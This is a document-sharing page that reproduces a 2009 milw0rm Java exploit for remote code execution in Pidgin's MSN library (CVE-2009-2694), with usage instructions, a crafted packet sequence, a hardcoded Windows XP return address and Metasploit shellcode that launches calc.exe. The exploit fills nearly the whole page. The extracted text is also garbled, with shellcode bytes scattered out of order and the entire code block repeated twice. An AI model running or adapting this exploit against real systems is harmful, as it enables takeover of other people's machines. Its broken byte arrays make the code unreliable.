Pidgin Exploit
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Pidgin Exploit as PDF for free.
More details
- Words: 845
- Pages: 5
/* * Pidgin MSN <= 2.5.8 Remote Code Execution * * Pierre Nogues - [email protected] * http://www.indahax.com/ * * * Description: * Pidgin is a multi-protocol Instant Messenger. * * This is an exploit for the vulnerability[1] discovered in Pidgin by coresecurity[2]. * The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets * which could lead to memory corruption. * * Affected versions : * Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library. * * Plateforms : * Windows, Linux, Mac * * Fix : * Fixed in Pidgin 2.5.9 * Update to the latest version : http://www.pidgin.im/download/ * * References : * [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694 * [2] http://www.coresecurity.com/content/libpurple-arbitrary-write * [3] http://www.pidgin.im/news/security/?id=34 * * Usage : * You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/ * javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java * java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL * */ import import import import import
net.sf.jml.*; net.sf.jml.event.*; net.sf.jml.impl.*; net.sf.jml.message.p2p.*; net.sf.jml.util.*;
public class PidginExploit { private private private private
MsnMessenger messenger; String login; String password; String target;
private int session_id = NumberUtils.getIntRandom(); private byte shellcode[] = new byte[] {
/* * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom ! * sub esp,500 */ (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00, (
(byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte)
/* * windows/exec - 121 bytes * http://www.metasploit.com * EXITFUNC=process, CMD=calc.exe */ (byte) 0xfc, (byte) 0xe8, (byte) 0x00, (byte) 0x8b, (byte) 0x45, (byte) 0x3c, (byte) 0x8b, (byte) 0x01, (byte) 0xef, (byte) 0x8b, (byte) 0x4f, (byte) 0x18, (byte) 0x01, (byte) 0xeb, (byte) 0x49, (byte) 0x8b, (byte) 0x34, (byte) 0x31, (byte) 0xc0, (byte) 0x99, (byte) 0xac, (byte) 0x84, (byte) 0xc1, (byte) 0xca, (byte) 0x0d, (byte) 0x01, (byte) 0xc2, (byte) 0x54, (byte) 0x24, (byte) 0x04, (byte) 0x75, (byte) 0xe5, (byte) 0x01, (byte) 0xeb, (byte) 0x66, (byte) 0x8b, (byte) 0x0c, (byte) 0x1c, (byte) 0x01, (byte) 0xeb, (byte) 0x8b, (byte) 0x1c, (byte) 0x89, (byte) 0x5c, (byte) 0x24, (byte) 0x04, (byte) 0xc3, (byte) 0x60, (byte) 0x56, (byte) 0x64, (byte) 0x8b, (byte) 0x46, (byte) 0x0c, (byte) 0x8b, (byte) 0x70, (byte) 0x1c, (byte) 0xad, (byte) 0x89, (byte) 0xf8, (byte) 0x83, (byte) 0xc0, (byte) 0x6a, (byte) 0xd8, (byte) 0xe2, (byte) 0x73, (byte) 0x68, (byte) 0x98, (byte) 0x57, (byte) 0xff, (byte) 0xe7, (byte) 0x63, (byte) 0x61, (byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00 };
0x44, (byte) 0x00, (byte) 0x00, 0x7c, (byte) 0x05, (byte) 0x78, 0x8b, (byte) 0x5f, (byte) 0x20, 0x8b, (byte) 0x01, (byte) 0xee, 0xc0, (byte) 0x74, (byte) 0x07, 0xeb, (byte) 0xf4, (byte) 0x3b, 0x8b, (byte) 0x5f, (byte) 0x24, 0x4b, (byte) 0x8b, (byte) 0x5f, 0x8b, (byte) 0x01, (byte) 0xeb, 0x5f, (byte) 0x31, (byte) 0xf6, 0x30, (byte) 0x8b, (byte) 0x40, 0x8b, (byte) 0x68, (byte) 0x08, 0x50, (byte) 0x68, (byte) 0x7e, 0xfe, (byte) 0x8a, (byte) 0x0e, 0x6c, (byte) 0x63, (byte) 0x2e,
// reteip = pointer to the return address in the stack // The shellcode will be wrote just before reteip // and reteip will automaticly point to the shellcode. It's magic ! private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8 private int neweip; private byte[] payload = new byte[shellcode.length + 4]; private int totallength = reteip + 4; public static void main(String[] args) throws Exception {
if(args.length != 3){ System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL"); }else{ PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]); exploit.start(); } } public PidginExploit(String login, String password, String target){ this.login = login; this.password = password; this.target = target; neweip = reteip - shellcode.length ; for(int i=0;i<shellcode.length;i++) payload[i] = shellcode[i];
}
payload[shellcode.length] = (byte)(neweip & 0x000000FF); payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8); payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16); payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
public void start() { messenger = MsnMessengerFactory.createMsnMessenger(login,password); messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE); messenger.setLogIncoming(false); messenger.setLogOutgoing(false); initMessenger(messenger); messenger.login(); } protected void initMessenger(MsnMessenger messenger) { messenger.addContactListListener(new MsnContactListAdapter() { public void contactListInitCompleted(MsnMessenger messenger) { final Object id = new Object(); messenger.addSwitchboardListener(new MsnSwitchboardAdapter() { public void switchboardStarted(MsnSwitchboard switchboard) { if (id != switchboard.getAttachment()) return; switchboard.inviteContact(Email.parseStr(target)); } public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) { if (id != switchboard.getAttachment())
return; MsnP2PSlpMessage msg = new MsnP2PSlpMessage(); msg.setIdentifier(NumberUtils.getIntRandom()); msg.setSessionId(session_id); msg.setOffset(0); msg.setTotalLength(totallength); msg.setCurrentLength(totallength); // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null // We'll use this buffer to rewrite memory in the stack msg.setFlag(0x1000020); msg.setP2PDest(target); switchboard.sendMessage(msg); System.out.println("First packet sent, waiting for the A ACK"); } public void switchboardClosed(MsnSwitchboard switchboard) { System.out.println("switchboardClosed"); switchboard.getMessenger().removeSwitchboardListener(this); } public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){ System.out.println("contactLeaveSwitchboard"); } }); messenger.newSwitchboard(id); } }); messenger.addMessageListener(new MsnMessageAdapter(){ public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) { m //We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();
MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip, payload.length, payload, target); switchboard.sendMessage(msg); System.out.println("ACK received && Payload sent !"); System.out.println("Exploit OK ! CTRL+C to quit"); } });
messenger.addMessengerListener(new MsnMessengerAdapter() { public void loginCompleted(MsnMessenger messenger) { System.out.println(messenger.getOwner().getEmail() + " login"); } public void logout(MsnMessenger messenger) { System.out.println(messenger.getOwner().getEmail() + " logout"); } public void exceptionCaught(MsnMessenger messenger, Throwable throwable) { System.out.println("caught exception: " + throwable); } }); }
}
// milw0rm.com [2009-09-09]
net.sf.jml.*; net.sf.jml.event.*; net.sf.jml.impl.*; net.sf.jml.message.p2p.*; net.sf.jml.util.*;
public class PidginExploit { private private private private
MsnMessenger messenger; String login; String password; String target;
private int session_id = NumberUtils.getIntRandom(); private byte shellcode[] = new byte[] {
/* * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom ! * sub esp,500 */ (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00, (
(byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte) (byte)
/* * windows/exec - 121 bytes * http://www.metasploit.com * EXITFUNC=process, CMD=calc.exe */ (byte) 0xfc, (byte) 0xe8, (byte) 0x00, (byte) 0x8b, (byte) 0x45, (byte) 0x3c, (byte) 0x8b, (byte) 0x01, (byte) 0xef, (byte) 0x8b, (byte) 0x4f, (byte) 0x18, (byte) 0x01, (byte) 0xeb, (byte) 0x49, (byte) 0x8b, (byte) 0x34, (byte) 0x31, (byte) 0xc0, (byte) 0x99, (byte) 0xac, (byte) 0x84, (byte) 0xc1, (byte) 0xca, (byte) 0x0d, (byte) 0x01, (byte) 0xc2, (byte) 0x54, (byte) 0x24, (byte) 0x04, (byte) 0x75, (byte) 0xe5, (byte) 0x01, (byte) 0xeb, (byte) 0x66, (byte) 0x8b, (byte) 0x0c, (byte) 0x1c, (byte) 0x01, (byte) 0xeb, (byte) 0x8b, (byte) 0x1c, (byte) 0x89, (byte) 0x5c, (byte) 0x24, (byte) 0x04, (byte) 0xc3, (byte) 0x60, (byte) 0x56, (byte) 0x64, (byte) 0x8b, (byte) 0x46, (byte) 0x0c, (byte) 0x8b, (byte) 0x70, (byte) 0x1c, (byte) 0xad, (byte) 0x89, (byte) 0xf8, (byte) 0x83, (byte) 0xc0, (byte) 0x6a, (byte) 0xd8, (byte) 0xe2, (byte) 0x73, (byte) 0x68, (byte) 0x98, (byte) 0x57, (byte) 0xff, (byte) 0xe7, (byte) 0x63, (byte) 0x61, (byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00 };
0x44, (byte) 0x00, (byte) 0x00, 0x7c, (byte) 0x05, (byte) 0x78, 0x8b, (byte) 0x5f, (byte) 0x20, 0x8b, (byte) 0x01, (byte) 0xee, 0xc0, (byte) 0x74, (byte) 0x07, 0xeb, (byte) 0xf4, (byte) 0x3b, 0x8b, (byte) 0x5f, (byte) 0x24, 0x4b, (byte) 0x8b, (byte) 0x5f, 0x8b, (byte) 0x01, (byte) 0xeb, 0x5f, (byte) 0x31, (byte) 0xf6, 0x30, (byte) 0x8b, (byte) 0x40, 0x8b, (byte) 0x68, (byte) 0x08, 0x50, (byte) 0x68, (byte) 0x7e, 0xfe, (byte) 0x8a, (byte) 0x0e, 0x6c, (byte) 0x63, (byte) 0x2e,
// reteip = pointer to the return address in the stack // The shellcode will be wrote just before reteip // and reteip will automaticly point to the shellcode. It's magic ! private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8 private int neweip; private byte[] payload = new byte[shellcode.length + 4]; private int totallength = reteip + 4; public static void main(String[] args) throws Exception {
if(args.length != 3){ System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL"); }else{ PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]); exploit.start(); } } public PidginExploit(String login, String password, String target){ this.login = login; this.password = password; this.target = target; neweip = reteip - shellcode.length ; for(int i=0;i<shellcode.length;i++) payload[i] = shellcode[i];
}
payload[shellcode.length] = (byte)(neweip & 0x000000FF); payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8); payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16); payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
public void start() { messenger = MsnMessengerFactory.createMsnMessenger(login,password); messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE); messenger.setLogIncoming(false); messenger.setLogOutgoing(false); initMessenger(messenger); messenger.login(); } protected void initMessenger(MsnMessenger messenger) { messenger.addContactListListener(new MsnContactListAdapter() { public void contactListInitCompleted(MsnMessenger messenger) { final Object id = new Object(); messenger.addSwitchboardListener(new MsnSwitchboardAdapter() { public void switchboardStarted(MsnSwitchboard switchboard) { if (id != switchboard.getAttachment()) return; switchboard.inviteContact(Email.parseStr(target)); } public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) { if (id != switchboard.getAttachment())
return; MsnP2PSlpMessage msg = new MsnP2PSlpMessage(); msg.setIdentifier(NumberUtils.getIntRandom()); msg.setSessionId(session_id); msg.setOffset(0); msg.setTotalLength(totallength); msg.setCurrentLength(totallength); // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null // We'll use this buffer to rewrite memory in the stack msg.setFlag(0x1000020); msg.setP2PDest(target); switchboard.sendMessage(msg); System.out.println("First packet sent, waiting for the A ACK"); } public void switchboardClosed(MsnSwitchboard switchboard) { System.out.println("switchboardClosed"); switchboard.getMessenger().removeSwitchboardListener(this); } public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){ System.out.println("contactLeaveSwitchboard"); } }); messenger.newSwitchboard(id); } }); messenger.addMessageListener(new MsnMessageAdapter(){ public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) { m //We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();
MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip, payload.length, payload, target); switchboard.sendMessage(msg); System.out.println("ACK received && Payload sent !"); System.out.println("Exploit OK ! CTRL+C to quit"); } });
messenger.addMessengerListener(new MsnMessengerAdapter() { public void loginCompleted(MsnMessenger messenger) { System.out.println(messenger.getOwner().getEmail() + " login"); } public void logout(MsnMessenger messenger) { System.out.println(messenger.getOwner().getEmail() + " logout"); } public void exceptionCaught(MsnMessenger messenger, Throwable throwable) { System.out.println("caught exception: " + throwable); } }); }
}
// milw0rm.com [2009-09-09]
Related Documents
Pidgin Exploit
June 2020 9
Pidgin Languages
May 2020 10
Tutorial Pidgin
April 2020 10
Exploit-develop
November 2019 14
Pidgin/finch Password Fetcher
May 2020 3